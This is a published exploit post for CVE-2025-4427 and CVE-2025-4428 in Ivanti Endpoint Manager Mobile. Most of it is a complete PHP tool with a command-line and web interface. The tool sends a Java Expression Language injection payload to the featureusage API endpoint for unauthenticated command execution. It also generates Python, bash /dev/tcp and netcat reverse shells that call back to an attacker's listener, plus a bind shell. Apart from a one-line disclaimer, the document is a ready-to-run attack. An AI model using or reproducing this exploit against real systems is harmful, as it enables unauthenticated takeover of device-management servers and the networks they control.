Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection

Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection

=============================================================================================================================================
| # Title Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection

=============================================================================================================================================
| # Title : Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ivanti.com/products/endpoint-manager-mobile |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/200146/ & CVE-2025-4427, CVE-2025-4428

[+] Summary :

The exploit targets two critical vulnerabilities in Ivanti EPMM:
CVE-2025-4427 - Authentication Bypass
CVE-2025-4428 - Expression Language Injection
The vulnerability chain allows unauthenticated attackers to execute arbitrary commands
on the target system through Java Expression Language (EL) injection in the /mifs/rs/api/v2/featureusage endpoint.

[+] Exploitation Mechanism

Endpoint Discovery: The exploit targets /mifs/rs/api/v2/featureusage

Payload Injection: Uses Java EL injection via the format parameter

Command Execution: Leverages Java runtime reflection to execute system commands

Result Extraction: Uses Java Scanner class to read command output
[+] POC :

php poc.php or http://127.0.0.1/poc.php

php poc.php -t target.com -c

php poc.php -t 192.168.1.100 -P command

php poc.php -t target.com -P reverse_shell -H YOUR_IP -L 4444

<?php
/*
* by indoushka
* CVE-2025-4427, CVE-2025-4428 - Ivanti EPMM RCE Exploit
*/

class IvantiEPMMExploit {
private $target;
private $port;
private $ssl;
private $base_path;
private $timeout;

public function __construct($target, $port = 443, $ssl = true, $base_path = '/') {
$this->target = $target;
$this->port = $port;
$this->ssl = $ssl;
$this->base_path = rtrim($base_path, '/');
$this->timeout = 30;
}

/**
* Vulnerability check
*/
public function check() {
echo "[*] Checking Ivanti EPMM vulnerability...\n";

$command = 'id';
$response = $this->execute_command($command);

if (!$response) {
echo "[-] Failed to get response from target\n";
return "unknown";
}

if (strpos($response, 'uid=') !== false && strpos($response, 'gid=') !== false) {
echo "[+] ? Target is vulnerable!\n";
return "vulnerable";
} else {
echo "[-] ? Target is not vulnerable\n";
return "safe";
}
}

/**
* Execute remote command
*/
private function execute_command($command) {
// Build Expression Language Injection payload
$payload = $this->build_el_payload($command);

$url = $this->build_url('/mifs/rs/api/v2/featureusage');

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url . '?format=' . urlencode($payload),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[*] HTTP Status: $http_code\n";

return $response;
}

/**
* Build Expression Language Injection payload
*/
private function build_el_payload($command) {
// Java Expression Language Injection for command execution
$payload = "\${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('{$command}').getInputStream()).useDelimiter('\\\\\\\\A').next()}";

return $payload;
}

/**
* Main exploit execution
*/
public function exploit($payload_type = 'reverse_shell', $lhost = null, $lport = null) {
echo "[*] Starting Ivanti EPMM exploitation...\n";

// Create payload based on type
$payload_cmd = $this->generate_payload($payload_type, $lhost, $lport);

if (!$payload_cmd) {
echo "[-] Failed to generate payload\n";
return false;
}

echo "[*] Executing payload...\n";
$response = $this->execute_command($payload_cmd);

if ($response) {
echo "[+] ? Payload sent successfully\n";
echo "[*] Check your reverse connection\n";
return true;
} else {
echo "[-] ? Failed to execute payload\n";
return false;
}
}

/**
* Generate different payloads
*/
private function generate_payload($type, $lhost, $lport) {
switch ($type) {
case 'reverse_shell':
if (!$lhost || !$lport) {
echo "[-] IP and port required for reverse shell\n";
return false;
}
return $this->generate_reverse_shell($lhost, $lport);

case 'bind_shell':
if (!$lport) {
echo "[-] Port required for bind shell\n";
return false;
}
return $this->generate_bind_shell($lport);

case 'command':
return 'id; whoami; uname -a; pwd';

default:
return 'id; whoami';
}
}

/**
* Generate reverse shell
*/
private function generate_reverse_shell($lhost, $lport) {
// Multiple reverse shells
$shells = [
// Python reverse shell
"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{$lhost}\",{$lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'",

// Bash reverse shell
"bash -c 'bash -i >& /dev/tcp/{$lhost}/{$lport} 0>&1'",

// Netcat reverse shell
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$lhost} {$lport} >/tmp/f"
];

return $shells[0]; // Use Python as default
}

/**
* Generate bind shell
*/
private function generate_bind_shell($lport) {
return "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"0.0.0.0\",{$lport}));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0); os.dup2(conn.fileno(),1); os.dup2(conn.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'";
}

/**
* Build full URL
*/
private function build_url($path) {
$protocol = $this->ssl ? 'https' : 'http';
$full_path = $this->base_path . $path;
return "{$protocol}://{$this->target}:{$this->port}{$full_path}";
}
}

// CLI Interface
if (php_sapi_name() === 'cli') {
echo "
?????? ??? ?????? ???? ???????????????
?????? ???????????????? ???????????????
?????? ????????????????? ??? ??? ???
??????? ?????????????????????? ??? ???
??? ??????? ??? ?????? ?????? ??? ???
??? ????? ??? ?????? ????? ??? ???

Ivanti EPMM RCE ExploitPHP Implementation

\n";

$options = getopt("t:p:s:u:c:P:L:H:", [
"target:",
"port:",
"ssl",
"uri:",
"check",
"payload:",
"lhost:",
"lport:"
]);

$target = $options['t'] ?? $options['target'] ?? null;
$port = $options['p'] ?? $options['port'] ?? 443;
$ssl = isset($options['s']) || isset($options['ssl']);
$base_uri = $options['u'] ?? $options['uri'] ?? '/';
$check_only = isset($options['c']) || isset($options['check']);
$payload_type = $options['P'] ?? $options['payload'] ?? 'command';
$lhost = $options['H'] ?? $options['lhost'] ?? null;
$lport = $options['L'] ?? $options['lport'] ?? 4444;

if (!$target) {
echo "Usage: php poc.php [options]\n";
echo "Options:\n";
echo " -t, --target Target host (required)\n";
echo " -p, --port Target port (default: 443)\n";
echo " -s, --ssl Use SSL (default: true)\n";
echo " -u, --uri Base URI path (default: /)\n";
echo " -c, --check Check only (don't exploit)\n";
echo " -P, --payload Payload type: command, reverse_shell, bind_shell (default: command)\n";
echo " -H, --lhost Listener host for reverse shell\n";
echo " -L, --lport Listener port for reverse shell (default: 4444)\n";
echo "\nExamples:\n";
echo " php poc.php -t 192.168.1.100 -c\n";
echo " php poc.php -t target.com -P reverse_shell -H 10.0.0.5 -L 4444\n";
exit(1);
}

$exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);

if ($check_only) {
$result = $exploit->check();
echo "\n[*] Result: {$result}\n";
} else {
if ($exploit->exploit($payload_type, $lhost, $lport)) {
echo "[+] Exploitation completed successfully\n";
} else {
echo "[-] Exploitation failed\n";
}
}

} else {
// Web Interface - FIXED VERSION
// Check if form was submitted
$action = $_POST['action'] ?? '';

if ($action === 'check' || $action === 'exploit') {
$target = $_POST['target'] ?? '';
$port = $_POST['port'] ?? 443;
$ssl = isset($_POST['ssl']);
$base_uri = $_POST['uri'] ?? '/';
$payload_type = $_POST['payload_type'] ?? 'command';
$lhost = $_POST['lhost'] ?? '';
$lport = $_POST['lport'] ?? 4444;

if (empty($target)) {
echo "<div style='color: red; padding: 10px; border: 1px solid red; margin: 10px;'>Target host is required</div>";
} else {
$exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);

ob_start();
if ($action === 'check') {
$exploit->check();
} else {
$exploit->exploit($payload_type, $lhost, $lport);
}
$output = ob_get_clean();

echo "<pre style='background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;'>$output</pre>";
}

// Show the form again after execution
echo '<a href="'.htmlspecialchars($_SERVER['PHP_SELF']).'" style="display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;">Back to Form</a>';
} else {
// Display the form
echo '<!DOCTYPE html>
<html>
<head>
<title>Ivanti EPMM RCE Exploit</title>
<meta charset="UTF-8">
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 20px;
background: #f5f5f5;
}
.container {
max-width: 800px;
margin: 0 auto;
background: white;
padding: 30px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
h1 {
color: #333;
border-bottom: 2px solid #007cba;
padding-bottom: 10px;
}
h3 {
color: #666;
}
.form-group {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 8px;
font-weight: bold;
color: #333;
}
input[type="text"], select {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
font-size: 14px;
}
.checkbox-group {
display: flex;
align-items: center;
gap: 10px;
}
button {
background: #007cba;
color: white;
padding: 12px 25px;
border: none;
border-radius: 4px;
cursor: pointer;
margin-right: 10px;
font-size: 16px;
transition: background 0.3s;
}
button:hover {
background: #005a87;
}
.danger {
background: #dc3545;
}
.danger:hover {
background: #c82333;
}
.info {
background: #17a2b8;
}
.info:hover {
background: #138496;
}
.warning-box {
background: #fff3cd;
border: 1px solid #ffeaa7;
color: #856404;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
.info-box {
background: #d1ecf1;
border: 1px solid #bee5eb;
color: #0c5460;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
</style>
</head>
<body>
<div class="container">
<h1>Ivanti EPMM RCE Exploit</h1>
<h3>CVE-2025-4427 & CVE-2025-4428 - Authentication Bypass & RCE</h3>

<div class="warning-box">
<strong>?? Warning:</strong> This tool is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.
</div>

<form method="post">
<div class="form-group">
<label for="target">Target Host:</label>
<input type="text" id="target" name="target" placeholder="192.168.1.100 or target.com" required>
</div>

<div class="form-group">
<label for="port">Port:</label>
<input type="text" id="port" name="port" value="443">
</div>

<div class="form-group">
<label for="uri">Base URI:</label>
<input type="text" id="uri" name="uri" value="/">
</div>

<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="ssl" name="ssl" checked>
<label for="ssl" style="display: inline; font-weight: normal;">Use SSL</label>
</div>
</div>

<div class="form-group">
<label for="payload_type">Payload Type:</label>
<select id="payload_type" name="payload_type">
<option value="command">Test Command (id; whoami)</option>
<option value="reverse_shell">Reverse Shell</option>
<option value="bind_shell">Bind Shell</option>
</select>
</div>

<div class="form-group">
<label for="lhost">Listener Host (for reverse shell):</label>
<input type="text" id="lhost" name="lhost" placeholder="Your IP address: 192.168.1.100">
</div>

<div class="form-group">
<label for="lport">Listener Port (for reverse shell):</label>
<input type="text" id="lport" name="lport" value="4444">
</div>

<button type="submit" name="action" value="check" class="info">Check Vulnerability</button>
<button type="submit" name="action" value="exploit" class="danger">Execute Exploit</button>
</form>

<div class="info-box">
<h3>About CVE-2025-4427 & CVE-2025-4428:</h3>
<p><strong>Vulnerability:</strong> Authentication Bypass + Expression Language Injection</p>
<p><strong>Affected Products:</strong> Ivanti EPMM, MobileIron Core</p>
<p><strong>Impact:</strong> Unauthenticated Remote Code Execution</p>
<p><strong>Endpoint:</strong> /mifs/rs/api/v2/featureusage</p>
<p><strong>CVSS Score:</strong> 9.8 (Critical)</p>
</div>
</div>
</body>
</html>';
}
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================